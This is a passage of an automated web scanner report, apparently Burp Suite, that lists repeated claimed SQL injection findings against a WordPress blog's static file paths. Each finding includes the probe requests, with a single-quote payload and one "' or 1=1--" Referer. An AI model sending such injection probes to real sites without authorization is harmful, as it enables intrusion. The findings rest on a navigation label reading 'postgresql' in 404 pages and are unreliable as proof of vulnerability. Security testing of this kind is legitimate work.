Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.44. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3'/styles/shCore.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.45. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles'/shCore.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.46. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css'?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.47. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content'/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.48. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins'/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.49. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter'/syntaxhighlighter3/styles/shThemeDefault.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.50. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3'/styles/shThemeDefault.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.51. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles'/shThemeDefault.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.52. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css'?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.53. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content'/themes/mystique/favicon.ico HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.54. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes'/mystique/favicon.ico HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.55. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes/mystique'/favicon.ico HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.56. http://h.ackack.net/wp-content/themes/mystique/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/favicon.ico

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes/mystique/favicon.ico' HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.57. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/js/jquery.mystique.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content'/themes/mystique/js/jquery.mystique.js?ver=2.4.2 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
